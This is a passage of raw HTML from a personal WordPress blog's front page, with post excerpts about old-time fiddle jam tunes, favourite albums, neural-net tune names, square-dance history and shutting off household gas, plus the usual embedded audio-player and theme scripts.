rel="tag">folklife</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2018/05/27/folklife-2018-thoughts/#comments">3 Comments<span class="screen-reader-text"> on Folklife 2018 Thoughts</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3355 --> <article id="post-3333" class="post-3333 post type-post status-publish format-standard hentry category-general"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2018/04/04/ten-albums/" rel="bookmark">Ten Albums</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>There&#8217;s a thing going around on Facebook where you post the covers of ten &#8220;all-time favorite albums that made an impact &amp; are on your rotation list, even if only now &amp; then&#8221;. You&#8217;re supposed to do one a day and tag someone else to participate each day. I hate doing that kind of thing, but it was interesting for me to see which ten albums came to mind first. It was these, in no particular order:</p> <p><div id='gallery-2' class='gallery galleryid-3333 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/Chess.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="150" height="150" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/Chess.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/dirty12.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="150" height="150" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/dirty12.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/Flood.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="150" height="147" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/Flood.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/goldberg.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="150" height="150" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/goldberg.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/graceland.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="150" height="150" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/graceland.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/Horseflies-HumanFly.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="150" height="150" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/Horseflies-HumanFly.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/joplin.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="150" height="150" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/joplin.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/Love-Of-A-Lifetime-cover.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="150" height="150" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/Love-Of-A-Lifetime-cover.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure><figure class='gallery-item'> <div class='gallery-icon portrait'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/ryko.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="148" height="150" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/ryko.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure><figure class='gallery-item'> <div class='gallery-icon landscape'> <a href='http://www.elsewhere.org/journal/wp-content/uploads/2018/04/shocked.jpg' rel='shadowbox[sbalbum-3333];player=img;'><img width="150" height="150" src="http://www.elsewhere.org/journal/wp-content/uploads/2018/04/shocked.jpg" class="attachment-thumbnail size-thumbnail" alt="" /></a> </div></figure> </div> </p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2018/04/04/ten-albums/" rel="bookmark"><time class="entry-date published updated" datetime="2018-04-04T10:49:57-07:00">2018/04/04</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/general/" rel="category tag">General</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2018/04/04/ten-albums/#comments">1 Comment<span class="screen-reader-text"> on Ten Albums</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3333 --> <article id="post-3315" class="post-3315 post type-post status-publish format-standard hentry category-general"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2018/01/19/tunes-from-portland-jams/" rel="bookmark">Tunes From Portland Jams</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Last weekend&#8217;s <a href="http://bubbaguitar.com/gathering/" target="_blank" rel="noopener">Portland Old Time Music Gathering </a>was a blast; I&#8217;m glad it wasn&#8217;t snowed in this year like it was last year. I got in at least ten hours of jamming over the weekend, and came back with a list of tunes that I wanted to remember were good jam tunes. Some I already knew, a lot I didn&#8217;t. Here&#8217;s the list, in no particular order (with youtube links for examples, where I can find them): <a href="http://www.elsewhere.org/journal/archives/2018/01/19/tunes-from-portland-jams/#more-3315" class="more-link">Continue reading<span class="screen-reader-text"> &#8220;Tunes From Portland Jams&#8221;</span></a></p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2018/01/19/tunes-from-portland-jams/" rel="bookmark"><time class="entry-date published" datetime="2018-01-19T00:16:42-07:00">2018/01/19</time><time class="updated" datetime="2018-01-19T10:59:09-07:00">2018/01/19</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/general/" rel="category tag">General</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2018/01/19/tunes-from-portland-jams/#respond">Leave a comment<span class="screen-reader-text"> on Tunes From Portland Jams</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3315 --> <article id="post-3310" class="post-3310 post type-post status-publish format-standard hentry category-general"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2018/01/17/jam-tune-id-help/" rel="bookmark">Jam Tune ID Help?</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Speaking of old-time tune names, can anyone help me ID some tunes whose names I didn&#8217;t catch at jams at the Portland Old-Time Gathering last weekend?</p> <p><div id="mp3jWrap_0" class="mjp-s-wrapper s-graphic unsel-mjp verdana-mjp" style="font-size:14px;"><span id="playpause_wrap_mp3j_0" class="wrap_inline_mp3j" style="font-weight:700;"><span class="group_wrap"><span class="bars_mp3j"><span class="loadB_mp3j" id="load_mp3j_0"></span><span class="posbarB_mp3j" id="posbar_mp3j_0"></span></span><span class="T_mp3j" id="T_mp3j_0" style="font-size:14px;">1. Freda?</span><span class="indi_mp3j" style="font-size:9.8px;" id="statusMI_0"></span></span><span class="gfxbutton_mp3j play-mjp" id="playpause_mp3j_0" style="font-size:14px;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></span></div><span class="s-nosolution" id="mp3j_nosolution_0" style="display:none;"></span><script> MP3jPLAYLISTS.inline_0 = [ { name: "1. Freda?", formats: ["mp3"], mp3: "aHR0cDovL3d3dy5lbHNld2hlcmUub3JnL2pvdXJuYWwvd3AtY29udGVudC91cGxvYWRzLzIwMTgvMDEvRnJlZGEubXAz", counterpart:"", artist: "", image: "", imgurl: "" } ]; </script> <script>MP3jPLAYERS[0] = { list: MP3jPLAYLISTS.inline_0, tr:0, type:'single', lstate:'', loop:false, play_txt:'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;', pause_txt:'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;', pp_title:'', autoplay:false, download:false, vol:100, height:'' };</script></p> <p>I think this one might be a version of Kenny Baker&#8217;s &#8220;Freda&#8221;, filtered through Carthy Sisco and then Jeanie Murphy and Scott Marckx. That&#8217;s definitely the provenance of the tune, anyway &#8212; I just missed the name.</p> <p>Update: That one&#8217;s in the Tractor Tavern book as &#8220;Frieda&#8221;, arranged by Carthy Sisco, so I got that one right.</p> <p><div id="mp3jWrap_1" class="mjp-s-wrapper s-graphic unsel-mjp verdana-mjp" style="font-size:14px;"><span id="playpause_wrap_mp3j_1" class="wrap_inline_mp3j" style="font-weight:700;"><span class="group_wrap"><span class="bars_mp3j"><span class="loadB_mp3j" id="load_mp3j_1"></span><span class="posbarB_mp3j" id="posbar_mp3j_1"></span></span><span class="T_mp3j" id="T_mp3j_1" style="font-size:14px;">2. Unknown-D-Tune-01</span><span class="indi_mp3j" style="font-size:9.8px;" id="statusMI_1"></span></span><span class="gfxbutton_mp3j play-mjp" id="playpause_mp3j_1" style="font-size:14px;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></span></div><span class="s-nosolution" id="mp3j_nosolution_1" style="display:none;"></span><script> MP3jPLAYLISTS.inline_1 = [ { name: "2. Unknown-D-Tune-01", formats: ["mp3"], mp3: "aHR0cDovL3d3dy5lbHNld2hlcmUub3JnL2pvdXJuYWwvd3AtY29udGVudC91cGxvYWRzLzIwMTgvMDEvVW5rbm93bi1ELVR1bmUtMDEubXAz", counterpart:"", artist: "", image: "", imgurl: "" } ]; </script> <script>MP3jPLAYERS[1] = { list: MP3jPLAYLISTS.inline_1, tr:0, type:'single', lstate:'', loop:false, play_txt:'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;', pause_txt:'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;', pp_title:'', autoplay:false, download:false, vol:100, height:'' };</script></p> <p>I didn&#8217;t catch the name of this one at all. <del>It might have had &#8220;spring&#8221; or &#8220;string&#8221; in the title? It starts off like Macklemoyle&#8217;s, but I don&#8217;t think it&#8217;s a version of that.</del></p> <p>Update: that one is &#8220;Spring in the Valley&#8221;, by Tom McCreesh.</p> <p><div id="mp3jWrap_2" class="mjp-s-wrapper s-graphic unsel-mjp verdana-mjp" style="font-size:14px;"><span id="playpause_wrap_mp3j_2" class="wrap_inline_mp3j" style="font-weight:700;"><span class="group_wrap"><span class="bars_mp3j"><span class="loadB_mp3j" id="load_mp3j_2"></span><span class="posbarB_mp3j" id="posbar_mp3j_2"></span></span><span class="T_mp3j" id="T_mp3j_2" style="font-size:14px;">3. Unknown-Jam-Tune-02</span><span class="indi_mp3j" style="font-size:9.8px;" id="statusMI_2"></span></span><span class="gfxbutton_mp3j play-mjp" id="playpause_mp3j_2" style="font-size:14px;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></span></div><span class="s-nosolution" id="mp3j_nosolution_2" style="display:none;"></span><script> MP3jPLAYLISTS.inline_2 = [ { name: "3. Unknown-Jam-Tune-02", formats: ["mp3"], mp3: "aHR0cDovL3d3dy5lbHNld2hlcmUub3JnL2pvdXJuYWwvd3AtY29udGVudC91cGxvYWRzLzIwMTgvMDEvVW5rbm93bi1KYW0tVHVuZS0wMi5tcDM=", counterpart:"", artist: "", image: "", imgurl: "" } ]; </script> <script>MP3jPLAYERS[2] = { list: MP3jPLAYLISTS.inline_2, tr:0, type:'single', lstate:'', loop:false, play_txt:'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;', pause_txt:'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;', pp_title:'', autoplay:false, download:false, vol:100, height:'' };</script></p> <p>If he said what this one was called, I didn&#8217;t hear it.</p> <p>Update: This one is &#8220;Old Buzzard&#8221;, a little different from the Doc Roberts source.</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2018/01/17/jam-tune-id-help/" rel="bookmark"><time class="entry-date published" datetime="2018-01-17T17:31:43-07:00">2018/01/17</time><time class="updated" datetime="2018-01-28T12:59:48-07:00">2018/01/28</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/general/" rel="category tag">General</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2018/01/17/jam-tune-id-help/#respond">Leave a comment<span class="screen-reader-text"> on Jam Tune ID Help?</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3310 --> <article id="post-3306" class="post-3306 post type-post status-publish format-standard hentry category-general tag-neural-net tag-old-time"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2018/01/16/neural-net-old-time-tune-names/" rel="bookmark">Neural Net Old-Time Tune Names</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>A while back, Cam made me a little twitter bot which made new old-time tune titles, using <a href="https://cheapbotsdonequick.com/" target="_top">Cheap Bots, Done Quick</a>. It came up with some pretty good ones, of which I think &#8220;Old Shoes on the Possum&#8221; was probably the best and most old-timey sounding.</p> <p>After seeing the kind of results Janelle Shane was getting out of neural network software for things like <a href="http://aiweirdness.com/post/160776374467/new-paint-colors-invented-by-neural-network" target="_blank" rel="noopener">paint color names</a>, <a href="http://aiweirdness.com/post/166075083502/trendy-beer-names-invented-by-neural-network" target="_blank" rel="noopener">trendy beer names</a>, and <a href="http://aiweirdness.com/post/140219420017/the-silicon-gourmet-training-a-neural-network-to" target="_blank" rel="noopener">cooking recipes</a>, Cam suggested I train the neural net software on old-time tune names and see what it would come up with. As it happens, I have a <a href="http://slowerthandirt.org/tunebook-index/" target="_blank" rel="noopener">relatively large list</a> of tune names already built, so I cleaned it up a bit and fed it into <a href="http://www.jeffreythompson.org/blog/2016/03/25/torch-rnn-mac-install/" target="_blank" rel="noopener">the software</a>. I haven&#8217;t played with many of the options for training or output options, so this is pretty much what I got by following the tutorial. <a href="http://www.elsewhere.org/journal/archives/2018/01/16/neural-net-old-time-tune-names/#more-3306" class="more-link">Continue reading<span class="screen-reader-text"> &#8220;Neural Net Old-Time Tune Names&#8221;</span></a></p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2018/01/16/neural-net-old-time-tune-names/" rel="bookmark"><time class="entry-date published" datetime="2018-01-16T17:44:17-07:00">2018/01/16</time><time class="updated" datetime="2018-01-16T17:46:34-07:00">2018/01/16</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/general/" rel="category tag">General</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="http://www.elsewhere.org/journal/tag/neural-net/" rel="tag">neural net</a>, <a href="http://www.elsewhere.org/journal/tag/old-time/" rel="tag">old-time</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2018/01/16/neural-net-old-time-tune-names/#comments">2 Comments<span class="screen-reader-text"> on Neural Net Old-Time Tune Names</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3306 --> <article id="post-3293" class="post-3293 post type-post status-publish format-standard hentry category-general"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2017/12/21/secret-racist-history/" rel="bookmark">The Secret Racist History of Clickbait</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>A few weeks ago, Wonkette writer Robyn Pennacchia came across some information that I thought more people knew about, but it turns out I was wrong because suddenly there was a rush to make breathless posts and videos repeating what she&#8217;d turned up. Namely, that Henry Ford hated modern music and dance, wrote racist screeds about them, and promoted square dancing; therefore, square dancing is racist or at the very least has a secret racist past. Her twitter thread starts here:</p> <blockquote class="twitter-tweet" data-width="550" data-dnt="true"> <p lang="en" dir="ltr">PUT YOUR TIN FOIL HATS ON, we are about to go on a VERY wild ride. </p> <p>I haven&#39;t been this excited since I first found out about the incredibly strange world of quicksand porn.</p> <p>&mdash; Robyn Pennacchia (@RobynElyse) <a href="https://twitter.com/RobynElyse/status/938916412248199168?ref_src=twsrc%5Etfw">December 7, 2017</a></p></blockquote> <p><script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p> <p>You can click on the tweet to load the full thread, but to summarize: she stumbled on the fact that a lot of states have the square dance as the official state dance. And to be fair, that is pretty weird, and there&#8217;s an <a href="https://juliannemangin.com/the-state-folk-dance-conspiracy/" target="_blank" rel="noopener">interesting story</a> behind it. Her research goes off the rails here: <a href="http://www.elsewhere.org/journal/archives/2017/12/21/secret-racist-history/#more-3293" class="more-link">Continue reading<span class="screen-reader-text"> &#8220;The Secret Racist History of Clickbait&#8221;</span></a></p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2017/12/21/secret-racist-history/" rel="bookmark"><time class="entry-date published" datetime="2017-12-21T14:59:53-07:00">2017/12/21</time><time class="updated" datetime="2018-01-16T17:45:16-07:00">2018/01/16</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/general/" rel="category tag">General</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2017/12/21/secret-racist-history/#comments">4 Comments<span class="screen-reader-text"> on The Secret Racist History of Clickbait</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3293 --> <article id="post-3289" class="post-3289 post type-post status-publish format-standard hentry category-general"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.elsewhere.org/journal/archives/2017/11/14/turning-off-your-gas-a-public-service-announcement/" rel="bookmark">Turning Off Your Gas: A Public Service Announcement</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>So you have a gas leak inside your house. Exciting! You probably want to do something about that. Here are your options (in Seattle):</p> <h2>By The Book</h2> <p> <a href="http://www.elsewhere.org/journal/archives/2017/11/14/turning-off-your-gas-a-public-service-announcement/#more-3289" class="more-link">Continue reading<span class="screen-reader-text"> &#8220;Turning Off Your Gas: A Public Service Announcement&#8221;</span></a></p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="byline"><span class="author vcard"><img alt='' src='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=49&#038;d=identicon&#038;r=r' srcset='http://1.gravatar.com/avatar/aae892785877397de782a1936354a167?s=98&#038;d=identicon&#038;r=r 2x' class='avatar avatar-49 photo' height='49' width='49' /><span class="screen-reader-text">Author </span> <a class="url fn n" href="http://www.elsewhere.org/journal/archives/author/josh/">Josh</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="http://www.elsewhere.org/journal/archives/2017/11/14/turning-off-your-gas-a-public-service-announcement/" rel="bookmark"><time class="entry-date published updated" datetime="2017-11-14T17:29:43-07:00">2017/11/14</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="http://www.elsewhere.org/journal/category/general/" rel="category tag">General</a></span><span class="comments-link"><a href="http://www.elsewhere.org/journal/archives/2017/11/14/turning-off-your-gas-a-public-service-announcement/#comments">1 Comment<span class="screen-reader-text"> on Turning Off Your Gas: A Public Service Announcement</span></a></span> </footer><!-- .entry-footer --> </article><!-- #post-3289 --> <nav class="navigation pagination" role="navigation"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><span aria-current='page' class='page-numbers current'><span class="meta-nav screen-reader-text">Page </span>1</span> <a class='page-numbers' href='http://www.elsewhere.org/journal/page/2/'><span class="meta-nav screen-reader-text">Page </span>2</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='http://www.elsewhere.org/journal/page/167/'><span class="meta-nav screen-reader-text">Page </span>167</a> <a class="next page-numbers" href="http://www.elsewhere.org/journal/page/2/">Next page</a></div> </nav> </main><!-- .site-main --> </div><!-- .content-area --> <aside id="secondary" class="sidebar widget-area" role="complementary"> <section id="search-4" class="widget widget_search"> <form role="search" method="get" class="search-form" action="http://www.elsewhere.org/journal/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <button type="submit" class="search-submit"><span class="screen-reader-text">Search</span></button> </form> </section> <section id="recent-posts-4" class="widget widget_recent_entries"> <h2 class="widget-title">Recent Posts</h2> <ul> <li> <a href="http://www.elsewhere.org/journal/archives/2019/05/15/saunders-violin-instructor/">A New and Scientific Self-Instructing School for the Violin, On an Entirely Different Method from Any Work of the Kind Heretofore Offered to the Public in This Country</a> <span class="post-date">2019/05/15</span> </li> <li> <a href="http://www.elsewhere.org/journal/archives/2018/10/30/neural-net-romance-book-titles/">Neural Net Romance Book Titles</a> <span class="post-date">2018/10/30</span> </li> <li> <a href="http://www.elsewhere.org/journal/archives/2018/09/07/the-mandela-effect-and-the-eff/">The Mandela Effect and the EFF</a> <span class="post-date">2018/09/07</span> </li> <li> <a href="http://www.elsewhere.org/journal/archives/2018/05/27/folklife-2018-thoughts/">Folklife 2018 Thoughts</a> <span class="post-date">2018/05/27</span> </li> <li> <a href="http://www.elsewhere.org/journal/archives/2018/04/04/ten-albums/">Ten Albums</a> <span class="post-date">2018/04/04</span> </li> </ul> </section><section id="recent-comments-4" class="widget widget_recent_comments"><h2 class="widget-title">Recent Comments</h2><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link"><a href='http://reddit.com' rel='external nofollow' class='url'>Chase Sorrows</a></span> on <a href="http://www.elsewhere.org/journal/archives/2002/11/14/mystery-school-bogosity/comment-page-4/#comment-3640296">Mystery School Bogosity (or: What the hell&#8217;s wrong with you people, anyway?)</a></li><li class="recentcomments"><span class="comment-author-link">ashwin</span> on <a href="http://www.elsewhere.org/journal/archives/2005/08/02/nuke-them-from-orbit/comment-page-1/#comment-3637882">Nuke them from orbit.</a></li><li class="recentcomments"><span class="comment-author-link">Lynn Fischer</span> on <a href="http://www.elsewhere.org/journal/archives/2011/01/22/how-to-open-a-fisher-price-record-player-music-box/comment-page-2/#comment-3636540">How to open a Fisher-Price Record Player Music Box</a></li><li class="recentcomments"><span class="comment-author-link">Villard</span> on <a href="http://www.elsewhere.org/journal/archives/2011/01/22/how-to-open-a-fisher-price-record-player-music-box/comment-page-2/#comment-3636529">How to open a Fisher-Price Record Player Music Box</a></li><li class="recentcomments"><span class="comment-author-link">Julia</span> on <a href="http://www.elsewhere.org/journal/archives/2002/01/08/seeking-magic-window/comment-page-8/#comment-3635270">Seeking Magic Window</a></li></ul></section><section id="nav_menu-5" class="widget widget_nav_menu"><h2 class="widget-title">Text Generators</h2><div class="menu-text-generators-container"><ul id="menu-text-generators" class="menu"><li id="menu-item-2680" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2680"><a href="http://www.elsewhere.org/hbzpoetry/">Adolescent Poetry</a></li> <li id="menu-item-2681" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2681"><a href="http://www.elsewhere.org/bandname/">Band Names</a></li> <li id="menu-item-2682" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2682"><a href="http://www.elsewhere.org/pomo/">Postmodernism</a></li> <li id="menu-item-2684" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2684"><a href="http://www.elsewhere.org/timecube/">Time Cube</a></li> </ul></div></section><section id="nav_menu-6" class="widget widget_nav_menu"><h2 class="widget-title">Misc</h2><div class="menu-other-things-container"><ul id="menu-other-things" class="menu"><li id="menu-item-2685" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2685"><a href="http://a.co/go3O59m">Buy Me Something</a></li> <li id="menu-item-2696" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2696"><a href="http://www.elsewhere.org/ddeck/">Discordian Tarot</a></li> <li id="menu-item-2698" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2698"><a href="http://www.emperornorton.net/">Emperor Norton</a></li> <li id="menu-item-2700" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2700"><a href="http://loteria.elsewhere.org/">Loteria Collection</a></li> </ul></div></section> </aside><!-- .sidebar .widget-area --> </div><!-- .site-content --> <footer id="colophon" class="site-footer" role="contentinfo"> <nav class="main-navigation" role="navigation" aria-label="Footer Primary Menu"> <div class="menu-menu-1-container"><ul id="menu-menu-2" class="primary-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-2667"><a href="http://www.elsewhere.org/journal/" aria-current="page">Home</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2678"><a href="https://www.facebook.com/rjl20">Facebook</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2679"><a href="https://twitter.com/rjl20">Twitter</a></li> </ul></div> </nav><!-- .main-navigation --> <div class="site-info"> <span class="site-title"><a href="http://www.elsewhere.org/journal/" rel="home">Communications From Elsewhere</a></span> <a href="https://wordpress.org/" class="imprint"> Proudly powered by WordPress </a> </div><!-- .site-info --> </footer><!-- .site-footer --> </div><!-- .site-inner --> </div><!-- .site --> <div style="display:none"> <div class="grofile-hash-map-aae892785877397de782a1936354a167"> </div> </div> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/uploads/shadowbox-js/a75a3370bbffd141580eaf7d157b4cc2.js?ver=3.0.3'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/plugins/jetpack/modules/wpgroho.js?ver=5.2'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen/js/skip-link-focus-fix.js?ver=20160816'></script> <script type='text/javascript'> /* <![CDATA[ */ var screenReaderText = {"expand":"expand child menu","collapse":"collapse child menu"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/themes/twentysixteen/js/functions.js?ver=20181230'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/plugins/jetpack/modules/theme-tools/responsive-videos/responsive-videos.min.js?ver=1.3'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-includes/js/jquery/ui/slider.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-includes/js/jquery/jquery.ui.touch-punch.js?ver=0.2.2'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/plugins/mp3-jplayer/js/jquery.jplayer.min.2.7.1.js?ver=2.7.1'></script> <script type='text/javascript' src='http://www.elsewhere.org/journal/wp-content/plugins/mp3-jplayer/js/mp3-jplayer-2.7.js?ver=2.7'></script> <!-- Begin Shadowbox JS v3.0.3.10 --> <!-- Selected Players: 